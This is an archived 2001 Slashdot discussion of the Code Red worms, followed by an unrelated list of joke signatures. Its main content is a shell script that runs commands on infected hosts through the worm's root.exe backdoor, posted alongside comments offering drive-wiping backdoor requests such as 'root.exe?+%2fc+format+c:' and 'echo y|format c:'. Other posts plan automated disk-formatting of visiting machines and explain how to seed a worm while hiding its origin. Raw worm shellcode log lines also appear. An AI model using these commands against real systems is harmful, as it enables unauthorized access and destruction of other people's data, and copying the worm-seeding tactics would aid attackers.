That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.

I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

#!/bin/sh
http_proxy=
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
ec ho host is down.
else
ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+ %22Your+w\
eb server+has+been+infected+with+the+CodeRed2+worm.+Y ou+have+a+security\
+h ole+so+big+that+you+can+drive+a+Mack+truck+through +it.+You+should+fi\
x+ it+before+some+script+kiddie+comes+along+and+takes +advantage+of+it.+\
+R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cs cripts+\(or+wherev\
er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscri pts+is+the+default\
+l ocation\).%22 >/dev/null
ec ho message sent.
fi
done

Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

Re:More information?

That should be 'net send %USERDOMAIN% "insert message here"'

Re:More information?

[macdaddy]

It's not offtopic if I'm answering someone's question. Damn trolls with moderator points to burn.

Re:More information?

[tijnbraun]

you can't actually kill iis on a nt server.. even if you're logged in as administrator... it will barf soemthing like "balbla not allowed". A command line kill does exist, but you'll have to download something from MS (google said it's Windows NT Resource Kit)... the other way is, believe it or not:
net stop "World Wide Web Pulishing Service"... this won't work however if IIS is trapped in an endless loop of some sort ...

Re:More information?

Actually, IIS itself runs at a very privledged level, LocalSystem (which is how the worm can infect a machine).

Normal requests, such as to root.exe, get impersonated in the context of another account, generally the anonymous user, IUSR_machinename.

Re:More information?

[penguinboy]

Unfortunately, IIS typically runs as a relatively unpriviliged service that doesn't have rights to format the hard drive. Some of the IIS installs out there are bound to be running with system-level access, though..

Re:More information?

[archmedes5]

Unless you know how to start disk administrator from a command prompt to format the drive, you might have problems. Especially since format the format command doesn't work the same way in NT. I just created a quick webpage and go thorugh the last few log and force iexplore.exe to open and point the page, they'll get the idea.

Re:More information?

[MouseR]

From the report on Headline news it is faster and creates a "bigger backdoor" than Code Red II

What the hell is a bigger backdoor?

One's socket after being rampaged with a big stick?

Gee, do I find reporters entertaining when they talk about things they don't know (which is about everything except reporting).

Re:More information?

[snake_dad]

Don't forget the "echo Y" pipe trick :-)
I don't know if that still works under NT though, fortunately no NT machine available to test it...

Re:More information?

[The+Troll+Catcher]

I can think of an easy way to still spread but nuke the machine:

Just set up a timer - have it run scans for a few hours, and then wipe the disk. Sounds pretty trivial, actually.

Re:More information?

[sqlrob]

WTF is a "bigger backdoor" than full access to the system from any web browser?

Re:More information?

Korea isn't in SE Asia, fool. Buy a map.

Re:More information?

Sorry if this is a lot to ask...

I have been using WebSnarf.pl to catch and log CodeRed requests. I would like to add the 'net send' as a response to WebSnarf.pl (from unixwiz.net). Also, I think sending to %USERDOMAIN% would make a big impact... Can anyone translate this to Perl?

Re:More information?

Full Telnet access.

Re:More information?

[reverius]

Actually, this is exactly what I thought when I read the article... a half hour before this was posted.

I thought "Code Red III" looked funny, but didn't think to submit it to Slashdot, what with it being a pile of crap and all... :)

I still think there are only two versions, and they're claiming the second one is the third.

Re:More information?

[helleman]

Modified version to grep standard apache log Change the top to be the following: file:#!/bin/sh for i in `(grep default /var/log/httpd/access_log | cut -f1 -d- | sort | uniq )` do=

Re:More information?

[blakestah]

In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.


What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
Still has the XXX and installs the backdoor

Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall

We can do it for them...

GET /script/root.exe?+%2fc+format+c:

Re:More information?

[Drone-X]

Don't forget the "echo Y" pipe trick :-)

I very much doubt piping or redirecting is going to work, the system (or its equivalent) call probably won't except that.

What you could do is issue a "deltree /y c:\*.*". However, I had no luck with doing a "dir c:\*.*" previously so perhaps only a "deltree /y ..\..\*.*" works via root.exe.

Re:More information?

[pi_rules]

There were/are three versions actually. Incarnations 1 and 2 had the same purpose though. CRv1a (I think that's the accepted name) had a rather dumb random number generator. CRv1b had a much more targeted random number generator. CRv1a and CRv1b were very close in code though. The code for v1b was in v1a, but wasn't activated. The author had it just jump over the not-yet-wanted portions. You can spot a CRv1 attempt because it uses N's to fill up the buffer.

CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.

In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.

Justin Buist

Re:More information?

[ncc74656]

maybe you should send it to more than just local host... you'd have to check on a windows box, but I think "net send /domain the server at $ip is infected by code red

I threw IIS onto my Win2K box (it sits behind a Linux firewall and only does workstation stuff) to play with different usernames. I considered sending to Administrator, but if nobody is logged in as an admin, nobody will see the message. Also, some shops change "Administrator" to something else, in which case sending to that name will fail altogether. (I'll allow that someone with the minimal clue needed to rename the admin account probably knows well enough to keep up on patches and updates, so this might not be a common occurrence.) Your suggestion to send to /domain only works if domain-based security is in use (presumably either the domain security in NT 4 or ActiveDirectory in Win2K). Most of the shops that are having problems with CodeRed probably don't know how to set up and manage domains.

Sending the popup to localhost, OTOH, makes reasonably sure the message gets to the server. It could be a problem if the server is stuck in a corner somewhere and nobody ever fires it up to check on it periodically.

I let the script loose this afternoon. For some reason, it only got to 229 hosts before conking out. (My CodeRed log page lists "3689 attempts logged from 1419 hosts" as of this writing. 2142 of those are from other lvcm.com customers.) Of those, it said 172 were down. Of the 57 that were up, 22 appear to have been fixed (Lynx came back with an error, probably because root.exe is gone from the CGI directory). 35 were still infected. 35 of 57...that's three out of five machines still opened wider than the goatse.cx guy, even after a week and a half.

Re:More information?

CRv1, original (also Code Red, or Code Red I) CRv2, the one you call CRv1b Code Red II Code Red III Four versions now.

Re:More information?

Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?
hmmm, that reminds me. I have to go visit The Red Pacman Menace sight.

Re:More information?

[ncc74656]

I should probably mention that if (like me) you're logging Apache traffic to MySQL with apachedb, you'll probably need to change the query to whatever requestid corresponds to /default.ida on your system. Going into MySQL and doing something like this:

use apache2
select id from request where request="/default.ida";

ought to work to get that info. Then again, if you're using apachedb, you've probably figured it out already, and I'm stupid for not having put this in the original post in any case. :-)

Re:More information?

[Phroggy]

Code Red II doesn't give you Administrator access; root.exe usually runs with the privaleges of the Internet Guest Account.

Re:More information?

[ichimunki]

well, in that case, can it be made to do Start->Shut Down... remotely?

Re:More information?

[wagnerer]

Doesn't the worm disable file privilges after the restart?

Re:More information?

[unitron]

For which command is /autotest an undocumented switch?

Re:More information?

[Shimmer]

What "echo Y" trick? I think I know what you're trying to do, but I'd like to know how to do it. (For theoretical purposes, of course.)

-- Brian

Re:More information?

[ichimunki]

If we have full access via web browser to the system, can't we simply send a GET with a URL ending in a goddam "poweroff" command or at least "kill -9 IIS" or "rm -rf /IIS/"? (Note that I include only Unix commands because I have no idea what these commands would be on NT)

Re:More information?

[ryanr]

The name Code Red came from Marc and Ryan at eEye. When the version of the original Code Red with the "improved" random number generator came out, they named the new variant CRv2, and re-named the first one CRv1. When we found the one that leaves the back doors, inside is the string "CodeRedII", which is used as an atom name. The author named that one himself.

Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.

For people who are asking in other threads here, CRv1 and CRv2 uses NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.

Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?

In any case, if someone is able to translate
this link
That would be a huge help.

Re:More information?

[asackett]

However, I had no luck with doing a "dir c:\*.*" previously so...

You may get 403'd several times, as the infected machines reach their limits after a while. Just keep poking at it, you'll get your directory listing. What you won't get, though, is privilege enough to shut down either IIS or the OS itself, format the drives, reboot the box, etc.

Some folks have taken to leaving graffiti in infected machines as they find them. It's awfully tempting...

Re:More information?

Check out:
http://www.incidents.org/diary/diary.php

According to Mr. Dittrich's analysis, Power infects Microsoft Windows 2000 and Windows NT systems running IIS servers that are vulnerable to the Unicode bug. The Power software is actively being developed, and the bot armies (which are controlled via an IRC channel) are most often used to wage distributed DoS attacks in IRC "wars". (See the following for more information about the unicode vulnerability.

Indeed, something is up!

Re:More information?

[snake_dad]

Purely hypothetical, this might work:

"echo y|format c:"

Theoretically this would bypass the "are you really, really, absolutely 100% sure that you want to format this drive which may cause some dataloss?" question... Ofcourse, theoretically, this only works in "english" versions of format.[com|exe|whatever].

I, hypothetically, could have used this to scare the living shit out of some friends, by typing it on the command prompt and then hovering over the enter key, grinning mischievously. I never did, ofcourse.

Maybe the format command needs a "/u" parameter, but researching this is left as an educational exercise for the reader :-)

PS: one word: .... backup! :)

Re:More information?

[Cheeko]

Actually I velieve that Code Red III is the varient that CNN reported is showing up in Southeast Asia (Korea I believe). From the report on Headline news it is faster and creates a "bigger backdoor" than Code Red II. Then again until it starts to hit someplace in the US or Europe I don't think it will be really confirmed.

Re:More information?

[cabbey]

maybe you should send it to more than just local host... you'd have to check on a windows box, but I think "net send /domain the server at $ip is infected by code red, see www.cert.org/advisories/CA-2001-23.html for details" would be more effective, especially if the server admin's bos sees it.

and while you're at it, stop the infection from spreading: 'net stop "Internet Information Server"' ;)

Re:More information?

[macdaddy]

Keys to the server farm, admin's car, and his or her house.

Re:More information?

[BigBlockMopar]

I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

Very, very, very cool. Thank you for sharing it. I'm going to hack it to tail a standard Apache log file and alert the luser directly.

Re:More information?

[BigBlockMopar]

We can do it for them...
GET /script/root.exe?+%2fc+format+c:

Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

Re:More information?

[cabbey]

oh yeah... I forgot about the requirements on having domain auth setup... it's already been there on every windows box I've every used.

Your numbers look a little better than mine, odd given that mine were all connected back within a few seconds of connecting to me.

Re:More information?

[Hulboy]

format c: /autotest will format a drive from a batch file with no prompts, IIRC.

Re:Obviously,IIS is *vastly* more popular then apa

[anshil]

Apache also runs per default on many linux distros, I also didn't know it until I entered once 'localhost' into my browser and was surprised that I got an answer...

However I believe that many linux users after some time where kudos and typed 'ps ax' and looked what each program is good for.

Marketing

[csbruce]

Code Red III which is apparently faster and more vicious than its entertaining predecessors.

I've always suspected that Code Red was secretly made by Microsoft's Marketing department to convince users to upgrade to the very latest products (and to grab XP as soon as it becomes available). That it's taken three versions to make Code Red work well is the proof!

Re:Microsoft should be sued

[tcc]

Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

THERE WAS a patch AVAILABLE *BEFORE* that virus got mainstream.

Why should microsoft get sued for having stupid users?

It's not like Linux didn't have any opened holes ever. You have to patch your linux? people have to patch their windows. Period. This virus is spreading like flu, not BECAUSE of microsoft, but because of INCOMPETENCE and cluelessness...

I mean, one simple patch, poof! no more problems. Why the heck do I still see my cable modem light flash like hell even after a WEEK that everyone knows about this thing?

See? that's a *&#@*(@& good argument for microsoft to tell the people "don't install non-certified drivers" "don't install non-ms-approved software" "don't do this and that"... people need to be wiped and taken by the hand to be shown what to do. This virus is the greatest proof that the world is full of clueless people and that's why some people won't care if their OS babysits them.

BTW, I don't like the idea of microsoft controlling everything (nor any other companies), I just say this will give them bullets to automate the patching/drivers things without your knowledge (and of course adding a couple of "justified" intrusive programs as well) Tech people always have to pay because of non-tech people, it always been like that... just like we have to pay high insurance rates because people have abused it and gave ammos to the insurance companies to f* us.

I'm so fucking tired of this virus.... where's the big reset switch of the internet? :)

Re:Perhaps we should reconsider...

[Rob+Mac+K]

However, as others have pointed out in other articles, "unauthorized access" is illegal, no matter what. Plus, if you shut someone down and they lose $50,000 in data (and find out you were the one who did it), they're going to have you arrested and sue you, probably for $50 million. Ask Kevin Mitnick about inflation from "damages" for "unauthorized access".

Yeah, I thought about that too. Of course, while one could argue that anyone propogating CR is asking to get shut down, that won't help you when The Man knocks on your door in the middle of the night.

If one was going to be smart (we're all smart, right? ;), one could query the offending web server IP, and if it's got the default IIS home page (easy to recognize), shut down IIS. It's obviously not being used.

It's tricky, though. Obviously, those (l)users can't be counted on to do even minimal administration on their servers (which many apparently don't even know they are running - nice going, Bill!)(Though to be fair, some Linux distributions - cought, RedHat, cough - turn on all sorts of random services by default that the user probably doesn't want/need.) The ISP's have been ridiculously slow to respond to the problem (though I read that finally RoadRunner is shutting off people who are infected - which *I* appreciate, since my cable modem light has been going bananas for days). I don't see another solution besides having the technical community take a proactive stance.

The kicker about all this is, now there are literally *thousands* of rooted boxen out there just waiting to be used in the biggest DDOS attack the world has ever seen. What we've seen so far is just the prologue to the real problem.

Network Engineers can help

For those of you network engineers who have not yet seen this.... The following link provides information on how to use some features of your cisco routers to stop code red from getting to your IIS servers. http://iponeverything.net/CodeRed.html

Re:Better Names

[Liquid(TJ)]

"Code Blue" is also what hosptials say over the intercom when someone dies and then need a trama team / defibulator. "Adult code blue, room 412. Adult code blue, room 412."

Re:It's not like they haven't announced the patch

[TheMidget]

> And if you know how to do that, you're not a 'stoopid mcse'.

True, a "stoopid mcse" could never design anything like that. But the problem is, he thinks he can... and will always find a gullible boss to believe him...

Re:Code Red is trying to eat me!

I had this problem. The modem would work for an indefinite amount of time then lock up requiring a power reset to work correctly again. Disabling the web access fixes the problem.

Re:Microsoft should be sued

[mpe]

Suppose you're a regular home user. You go to the store and buy a PC with windows preinstalled. Since you get the OEM version of Windows you don't get a nice windows box, you don't even get a decent manual, all you get is a license and, if you're lucky, a CD.

Dosn't really matter how you buy Windows, you arn't going to get even a half decent manual....

Not bad, but...

[DahGhostfacedFiddlah]

i'm still waiting for the release of Ultra Turbo Code Red XI, Player's Edition...

Re:make some money off banner ads

Hell just take the script that makes a pop up on the screen of the infected user computer, and instead of a pop up window, just have it start IE with the URL needed from your site to then redirect it to the banner ads.

Hell it is just to simple.

Perhaps we should reconsider...

[Rob+Mac+K]

I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response, but I wonder if the right thing to do to protect against the worm (actually, against all the morons still running these unpatched servers) would be to log an "attacking" IP, then "counterattack" by executing a command on those servers to shut them down, so they'd quit trying to infect everything in sight? I mean, geez, I know it's probably ethically (and legally) wrong to exploit the back doors, even if it's just to shut down the servers, but wouldn't that be better than sitting around doing nothing? (Since the various ISPs don't seem to be doing anything other than sending out e-mail - at this point, ignorance can't be an excuse for anyone still running an unpatched server).

Thoughts?

Re:Perhaps we should reconsider...

[tringstad]

I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response

I would have agreed with you, and there was a debate about it in one of the earlier articles, but it seems that @home has no problems with that type of behavior. I found this interesting gem in my server logs last night:

2001-08-09 04:08:11 24.0.0.203 - me.me.me.me 80 GET /c/winnt/system32/cmd.exe /c+VER 404 -

At first I thought it was just another leet script kiddie, tap, tapping at my ports, but the originating address struck me as interesting, so I did a quick nslookup:

Name: authorized-scan1.security.home.net
Address: 24.0.0.203

Authorized Scan?!? By whom?!? I don't recall the TOS mentioning anything about my ISP being authorized should they want to try rooting me...

I calmed down, thinking maybe it was just a one time scan, to see who was infected, but it has since popped up a few more times. And what's more, they certainly don't seem to have been very effective in doing anything, as I'm still being flooded as much as before.

(And yes, I realize this is not the exact same thing described by the parent, but it was similar, and reminded me about it, getting me fired up again.)

-Tommy

Re:Perhaps we should reconsider...

[norton_I]

I have been seriously considering the "counterattach" method for a while now (as opposed to a self replicating anti-virus, which I am firmly opposed to).

I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.

Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."

This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.

Re:Perhaps we should reconsider...

[alpinist]

Though I'm only getting ~20 CR hits per hour and my local network appears unaffected, I did think about exactly that.

However, as others have pointed out in other articles, "unauthorized access" is illegal, no matter what. Plus, if you shut someone down and they lose $50,000 in data (and find out you were the one who did it), they're going to have you arrested and sue you, probably for $50 million. Ask Kevin Mitnick about inflation from "damages" for "unauthorized access".

Unless this anti-worm self-propagates, then anyone with a system running this worm must have installed it themselves, and would have a hard time arguing that they didn't know what it was doing. If the anti-worm self propagates, then it's another worm that though it has benign intent, may have serious flaws that won't be picked up until it's too late. Internet worm of 1988 a case in point.

Re:Perhaps we should reconsider...

[norton_I]

Yeah, but the webserver would be off. There is not vulnerability until it is turned back on. The goal is, if someone actually uses their webserver, they will notice it is off, and when they turn it on, the first thing they will see is "you need to install this patch". If they don't use it, they will never notice it is off, and they will be immune to all further IIS worms.

Re:Perhaps we should reconsider...

[Rob+Mac+K]

That's basically what I would do, with the caveat that I'd make sure they were running the default IIS home page before I turned off IIS. It's far from a perfect solution, but it's better than nothing...

How would you cover the worm tracks?

Usually a worm or virus can be traced to its originator by diligently going thru logs and such until you can isolate the first occurence. If such a process were in place for tracking, how would you sneak a worm like CodeRed Vx.x onto the internet without leaving a track. Here is one possibility, assuming that the perpetrator is at least a competent cracker.

1) First, stealthily locate a vulnerable IIS server. Simple, pick one.

2) Crack a pr0n server and replace a link to some good kiddy pr0n with a link that contains the url with the worm code pointed to the server found in step 1.

3) You KNOW someone will hit that link and since the request never returns, he/she will go merrily on down the list thinking "damn, IE screwed up again".

4) Once the CodeRed requests are spotted on the net, recrack the pr0n site and restore the link. Be sure and cover your tracks on this crack.

Killed two, or maybe three birds with one stone. The worm is started, and if it does get tracked back to the original worm url, you take out a pr0n site and a peddy.

Alternatively, crack any site that you think needs to be per^H^Hrosecuted.

Re:Not SYSTEM-level access....

[baptiste]

But Code Red II created virtual drives which allowed you to access cmd.exe directly via a corrupt explorer with root rights. So it had a pretty large back door to begin with - I look forward to the analysis of Code Red III if such a thing exists.

Re:An ETHICAL way to Anti-Virus

[nitehorse]

Actually, if you add a line in your httpd.conf that looks like this:

AddHandler cgi-script .ida

then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:

AddType application/x-httpd-php .php .php3 .ida

Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.

-Chris

How can Code Red Be Stopped?

[skinney]

I am really getting tired of this virus. I have @home and I have been getting hammered for the last 8 days. So bad that I can't even use my connection. I don't even have windoze, I'm running Mandrake 8. I just wish that some one would write a counter virus to fix the machines with the bio-hazard. *sigh*

Re:How can Code Red Be Stopped?

[sjonke]

Simple: do like Israel and fire a barrage of missiles at buildings/homes that may contain computers running Windows, obliterating both the potentially offending computer and pathetic owner who would likely buy again.

Re:How can Code Red Be Stopped?

The good thing that MS is getting of all this, is that IIS may take 10% of market share from Apache with all these hits, scaning IIS sites. Not bad at all for MS. At the end, MS always will fault the lazies SysAdmin. :-)

Re:Linux to the rescue?

[Bagheera]

This has been proposed on a number of mailing lists since the original CR1 incident. Variations of the "Let's write a good virus" theme have been around probably since the days of the original Morris WORM. In theory, it's a good idea, but the reality would probably turn out far less effective than we'd hope.

A full discussion might actually be productive, but you'll probably find better threads on this idea on the vuln-dev or incidents mailing lists from securityfocus.

Something new in my logs..

[jvoisin]

I am getting a new request in the logs now. It's the same as the XXXXXXX one minus the /default.ida? part. I have gotten two from separate servers.

It looks like there actually may be a 3rd variant out there now...

Pardon the paste from the logs..

24.39.192.34 - - [10/Aug/2001:13:40:13 -0400] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u 9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u00 00%u00=a HTTP/1.1" 400 - "-" "-"
24.93.248.122 - - [11/Aug/2001:00:23:50 -0400] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78 01%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3 %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 - "-" "-"

Has anyone gotten something similar or am I loosing it?

Re:Something new in my logs..

Oh sorry, that was just me poking around. No harm no foul.

OK lets shut down infected boxes -

[Ozric]

Why can't we use the open cmd.exe to shutdown the IIS service on the infected boxes. I would like to know how to take control of an infected box and do just that. I don't know if it would be legal but, clogging up my connection will crap and not patching your server is just as bad. What is stopping us? Someone post how to do it please, I will shutdown all the boxes attacking me and if enuff people do it, we might just stop this bitch.

Re:OK lets shut down infected boxes -

http://ip/scripts/root.exe?/c+net+stop+IISSERVICEN AME where IISSERVICENAME is the name of the IIS service, which I don't remember. The root.exe process might not have rights to do this, i am not sure.

Code Red was launched by MS itself!

MS now got shitloads of IP's of servers that run their products. I guess half of those werent paid for.

Patch them already... damnit!

[kalislashdot]

I don't get it, this is all over the tech news and people have not patched yet. Come on already.

I run iPlanet (Netscape) at work and Apache at home and I just sit back and laugh at all the default.ida hits in my logs. My boss asked me "Are they getting anything?", and I said "Ya, a 404 error."

Re:Patch them already... damnit!

My, aren't you the coolest motherf'er in the IT dept?

Re:Can the internet community sue microsoft?

[darkPHi3er]

"...but don't you technically pay for the license to use the software.."

IANAL (but i act like one on /.), BUT that is ***CORRECT***, with M$ and most shrinkwrapped s/w, you are buying the license to USE the s/w, LEGALLY ***you DO NOT own the s/w***, there are a zillion reasons why this is done, but not least is the fact (and directly relevant here) the owner of thing has many many more legal rights than the leasor/borrower/stealer/renter of the same thing

further, many products that have substantial liability and/or danger attached; car batteries, firearms, knives, nunchucks, network news, yada... have NO requirement to provide you an external warning. it is presumed that when you open the package, RTFM and assess the potential hazards that if you don't accept them, you'll return them. unless it's changed MS', agreement with its resellers forces the resellers to buy back any product not installed due to customer failure to accept the license....

it may be more useful to think of s/w as similar to things that can affect large bodies of people, weather, war, famine, disease, religion, weapons of mass destruction, and other post-national affectors.....

the only way that the use/adoption/deployment of any thing not deemed useful or in the common interest or outright dangerous, can be affected is by large #'s of responsible individuals who can coordinate together to stop/correct it...

the Big Stuff (as always) must be handled by the adminstration of personal and civic responsibility...

the Court system (any Court System, anywhere/everywhere) is at best simply a bunch of guys in one of grandma's old outfits, routinely applying predetermined logic blocks to roughly analogous situations..it was never meant to handle the Big Stuff and/or replace the aforementioned personal/civic responsibility...

Re:Interesting log enrtry

[RWC09]

I started receiving the same thing after I UPGRADED to the new @HOME software in windows (I know I know - but the kids won't switch so I have to dual boot!). I'm running portsentry so it just blocks it out.

Re:More info on Code Red III

At least give some credit!! That was origionally a spoof of the goodtimes hoax.

Slashdot Humor

[Futurepower(tm)]

-

I've been making a list of the best of Slashdot humor. Here it is. In the beginning I did not record the user name:

Lotteries are a tax on people who suck at math.

"He that is wounded in the stones, or hath his privy member cut off, shall not enter into the congregation of the LORD." - Deuteronomy 23:1

The metric system is the tool of the devil!! i get forty rods to the hogshead, and that's the way i likes it!!

Someone had to put all that chaos there! by Greyfox (nride@uswest.net)

I love vegetarians - some of my favorite foods are vegetarians.

"Today's forecast calls for sprinkles of genius with a chance of doom!" - Stewie Griffin

The truth does not set you free, it just makes everyone irritable.

Which is worse: Ignorance or Apathy? Who knows? Who cares?

It's pretty funny, actually. It all started when I thought that inflammable was the opposite of flammable...

From a signature line at the end of every message: [Drink Coke] [Army - Be All You Can Be] [This ad space for sale! Contact the author for current rates]

"You can't have everything. Where would you keep it?" -- Steven Wright

A computer without a Microsoft operating system is like a dog without bricks tied to it's head. dieMSdie (steve@spam-is-bad.xtn.net)

"Science is like sex: sometimes something useful comes out, but that is not the reason we are doing it" -- Richard Feynman

This is a UNIX email virus. It works on the honor system: If you're running a variant of unix , please forward this message to everyone you know and delete a bunch of your files at random. Thank you for your cooperation. by pjl@patsoffice.com

Error: Cannot find file REALITY.SYS - Universe halted, please reboot! (NoSpam_Jonathan_Bayer@bigfoot.com)

It's sad to live in a world where knowing how to program your VCR actually lowers your social status... (rhopkins-at-crosswinds-dot-net)

Disclaimer: The opinions expressed in this post are not necessarily mine, as I've not yet had my medication today. (jmblant@clemson.dontsendmespam.edu)

When I have to develop under Windows, I spend long, frustrating days where mis-handling of a pointer causes BSOD, not a core dump. (Gen-GNU)

"Linux is a beautiful thing, but beauty is in the eye of the beholder, and we're geeks.

Be nice to your friends. If it weren't for them, you'd be a complete stranger. (Yamao)

The white zone is for loading and unloading only by error 404 on Mon Jun 12th, 2000 at 10:30:10 AM EST, kuro5hin

5.72 MOhms across my tongue... should i be concerned? MrResistor (mrresistor@hotmail.com) on Tuesday June 13, @03:38PM EDT (SD)

"Why does everyone always overgeneralize?" by p3d0 on Monday June 05, @12:37PM EDT (SD)

If at first you don't succeed, try a shorter bungee. by leonbrooks on Thursday June 15, @08:10PM EDT

-- Any attempt to brew coffee with a teapot should result in the error code "418 I'm a teapot". The resulting entity body MAY be short and stout. [RFC 2324] by Eric Green (eric@badtux.org) on Thursday June 15, @03:48PM EDT

The Internet interprets advertising as damage and routes around it. by Paul Crowley (slashdot-paul@cluefactory.org.uk)

There are two kinds of people in this world -- Those who divide people into two groups and those who don't. by YogSothoth (jdumas9@z3eh.com (s/[0-9]//g)) on Friday June 16, @08:22PM EDT

The Christian Right is Neither -- by cbuskirk (cbuskirk@yahoo.com) on Friday June 16, @07:35PM EDT

Inertia's what makes the world go 'round. -- by rana on Friday June 16, @07:54PM EDT

If you are angry with someone, you should walk a mile in their shoes... then you'll be a mile away from them, and you'll have their shoes. -- by hobbit (hamish@nutshell.SPAM.freeserve.SPAM.co.uk)

Fruit flies like bananas... Time flies like the wind... by DanBari on Tuesday June 20, @02:19AM EDT

Who is General Failure, and why is he reading my hard drive? mcelrath (mcelrath+slashdotcomment@draal.physics.wisc.edu)

"One World, one Web, one Program" - Microsoft promotional ad "Ein Volk, ein Reich, ein Fuhrer" - Adolf Hitler by Wakko Warner (wakko@qwerty.bitey.net) on Wednesday June 21, @09:25PM EDT

"'Tis some script kidd3z," I muttered, "tapping at my server port-Only this, and nothing more." by Barbarianconanford_please-no@spam-yahoo.com) on Thursday June 29, @07:11PM EDT

The early bird gets the worm, but the second mouse gets the cheese. warpathwarpath@the-cantina.com) on Thursday July 06, @06:13PM EDT

-o-"Warning: You are logged into reality as root..."-o- by Munky_v2email_me@www.dialug.org) on Friday July 07, @09:32AM EDT

There are three types of people in the world; those who can count, and those who can't. -- by Uruks2mdalle@titan.vcu.edu) on Monday July 10, @02:04PM EDT

All generalizations are false. -- by The_Messengerkmfms.com@drew) on Monday July 10, @04:07PM EDT

A theory: Women do not, snore, burp, sweat or fart. Therefore, they must bitch, or they will explode. -- byy m0nkeyb0y on Wednesday July 12, @01:34AM EDT

Why is it that it's a penny for your thoughts, but you have to put your two cents in? Somebody's makin a penny. --Steven Wright

I've lost my faith in nihilism. -- by hey!mattleo@treehouse.acrcorp.com) on Monday July 17, @10:08AM EDT

Being a geek means never having to ask, "Paper or plastic?" -- by Loligoljm@delete_this.fc.net) on Friday July 21, @01:40PM EDT

"Ah yes, the Tomahawk Cruise missle... the rich country's car bomb." -- by Rand Race (helixp@nospam.bellsouth.net) on Friday July 21, @03:29PM EDT

I am hypoallergenic, dermatologist tested, and dishwasher safe... -- by ecliptic_1 (ecliptic_1@spamsux.bigfoot.com) on Friday July 21, @09:49PM EDT

The problems that exist in the world today cannot be solved by the level of thinking that created them. -- Einstein

There is nothing more odious to me than an expensive church. -- by brogdonandrew(at)imagersoft.com) on Tuesday August 01, @02:58PM EDT#106)

"Bill Gates is just a monocle and a Persian Cat away from being one of the bad guys in a James Bond movie." - Dennis Miller

Bad spellers of the world, untie! -- by Fjord_Reddfjord_redd@programmer_dot_net) on Wednesday August 02, @10:43AM EDT#19)

Every night, tired dyslexics around the world look forward to 8 hours of peels. -- by sirinekbillHATESSPAM@sirinek.com) on Wednesday August 09, @12:45PM EDT#124) (User #41507 Info)http://www.sirinek.com

"I do know I'm ready for the job. And, if not, that's just the way it goes." G. W. Bush 8/21/2000

by NecroPuppy on Tuesday August 22, @10:51PM EDT#14) (User #222648 Info) A friend of mine has a barcode on his arm. He rings up as a $.35 pack of JuicyFruit.

